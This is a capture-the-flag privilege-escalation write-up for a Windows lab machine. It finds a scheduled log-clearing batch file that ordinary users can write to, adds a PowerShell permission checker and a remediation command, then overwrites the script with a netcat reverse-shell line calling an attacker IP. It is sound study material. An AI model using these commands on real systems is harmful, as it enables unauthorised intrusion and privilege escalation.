Last updated
#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
* nothing pertinent
daniel@MARKUP C:\Users\daniel> dir c:\
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\
03/12/2020 03:56 AM <DIR> Log-Management
07/28/2021 03:38 AM 0 Recovery.txt
* these are the only two UNCOMMON files
- always analyze UNCOMMON files prior to going into a rabbit hole
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt
blank file
daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\Log-Management
03/06/2020 02:42 AM 346 job.bat
daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
* understand the purpose of the batch file, who is meant to run it, and what can be manipulated
- bcdedit needs administrator rights; for a normal user it prints "Access is denied.", so the
first token becomes "Access" and the script bails out at :noAdmin. The script is therefore
intended to run under a privileged account (e.g. a scheduled task)
- when it does run as admin it enumerates every event log (wevtutil el) and clears each one
(wevtutil cl): an anti-forensic log-wiping job
#view file permission
daniel@MARKUP C:\Users\daniel> icacls c:\Log-Management\job.bat
c:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
* the wevtutil is used to interact with the Windows Event Log service
- it can retrieve information about event logs and publishers and can
also install and uninstall event manifests, run queries and
export, archive and clear logs
- the el (enumerate logs) parameter lists all event logs currently available
on the system
- the cl (clear log) clears the specified event log.
* the icacls cmd is used to view, modify, back up, and restore NTFS file
and folder permissions (Access Control Lists, or ACLs).
- it’s the modern replacement for older tools like cacls and xcacls.
- entries marked (I) are inherited from the parent folder; an entry without (I) was set
explicitly on the file itself
* the group BUILTIN\Users has an explicit, non-inherited full control (F) entry on the file,
on top of the inherited read/execute (RX). BUILTIN\Users contains every local account
(and, on domain members, domain users) by default
- this includes the user Daniel, so Daniel can overwrite a script that is executed by a
privileged account: that is the privesc path
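The permission check above generalises: any file a low-privileged user can modify that is later executed by a privileged account is a privesc candidate. The following PowerShell is an added example (not part of the original writeup) that checks a given file, or hunts a set of non-standard directories, for ACEs granting write/modify/full control to the current user's token groups. Root directories, extensions and the job.bat path are illustrative; Deny ACEs are ignored for brevity.

```powershell
# Added example, not code from the original writeup.
# Run as the foothold user on the target. Reports Allow ACEs on a file that grant
# write-capable rights to the current user or any group in the current token.
# Simplification: Deny ACEs are not evaluated (they would normally take precedence).

function Test-WritableByMe {
    param([Parameter(Mandatory)][string]$Path)

    # Rights that let us change the file's contents; FullControl and Modify both include WriteData
    $mask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData'

    # SIDs of the current user and every group in the current access token (e.g. BUILTIN\Users)
    $id     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # orphaned / untranslatable SID, skip
        if ($mySids -notcontains $sid) { continue }

        if (([int]$ace.FileSystemRights -band [int]$mask) -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # $false == explicit ACE set on the file itself
            }
        }
    }
}

# Hunt: writable scripts/binaries under "uncommon" directories (roots are an assumption,
# pick whatever looked out of place in dir C:\)
function Find-WritableScript {
    param(
        [string[]]$Root = @('C:\Log-Management', 'C:\ProgramData'),
        [string[]]$Ext  = @('.bat', '.cmd', '.ps1', '.vbs', '.exe', '.dll')
    )
    Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $Ext -contains $_.Extension } |
        ForEach-Object { Test-WritableByMe -Path $_.FullName }
}

# Usage on this box: the explicit BUILTIN\Users FullControl entry shows up with Inherited = False
Test-WritableByMe -Path 'C:\Log-Management\job.bat' | Format-Table -AutoSize
Find-WritableScript | Format-Table -AutoSize
```

From the defender's side the same check is the remediation test: after `icacls C:\Log-Management\job.bat /remove:g "BUILTIN\Users"` (which drops the explicit grant and leaves the inherited RX in place) Test-WritableByMe should return nothing for a standard user.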
#use the writable batch script to run the transferred netcat in order to get a reverse shell
daniel@MARKUP C:\Users\daniel>tasklist /V
ERROR: Access denied
daniel@MARKUP C:\Users\daniel>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\daniel> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
31 5 736 2068 1824 1 wevtutil
* wevtutil is running even though we never started it, so job.bat is being executed on a
schedule by some other account (tasklist /V, which would have shown the owner, was denied)
- before overwriting the script it is worth polling get-process a few times to confirm the
execution is recurring and get a feel for the interval
root@htb:~$ wget https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
2025-05-10 21:42:31 (105 MB/s) - ‘nc64.exe’ saved [45272/45272]
root@htb:~$ python3 -m http.server 8081
PS C:\Users\daniel> wget http://10.10.14.215:8081/nc64.exe -OutFile nc64.exe
PS C:\Users\daniel> cmd
daniel@MARKUP C:\Users\daniel> cd c:\Log-Management
daniel@MARKUP c:\Log-Management>copy c:\users\daniel\nc64.exe c:\Log-Management
1 file(s) copied.
daniel@MARKUP C:\Users\daniel> echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321 > C:\Log-Management\job.bat
* DO NOT enclose the command in quotes: echo writes the quotes literally into job.bat and
the line will not execute as intended
- note that the whole script, including the admin check, is replaced; the scheduled run
now just executes nc64.exe under the scheduling account's privileges
daniel@MARKUP c:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321
root@htb:~$ nc -nlvp 4321
...
* wait for the script to execute
root@htb:~$ nc...
listening on [any] 4321 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.24.24] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.